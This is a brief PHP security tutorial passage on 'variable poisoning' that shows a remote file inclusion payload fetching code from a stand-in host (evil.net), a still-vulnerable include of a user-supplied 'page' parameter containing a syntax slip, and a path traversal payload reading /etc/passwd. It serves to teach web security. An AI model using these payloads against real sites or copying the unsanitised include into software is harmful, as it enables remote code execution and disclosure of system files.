Variable Poisoning :: Chapter 2

Variable Poisoning :: Chapter 2

[Past Exploits]
  1. ./?page=ftp://user:pass@evil.net/arbitrary_code.php
New Code
  1. // php.ini :: allow_url_fopen = Off
  2. $path = '/path/to/pages/';
  3. if (file_exists ($path . $_GET['page'];)) {
  4.     include $path . $_GET['page'];
  5. }
Attack:
  1. ./?page=../../../../../../../etc/passwd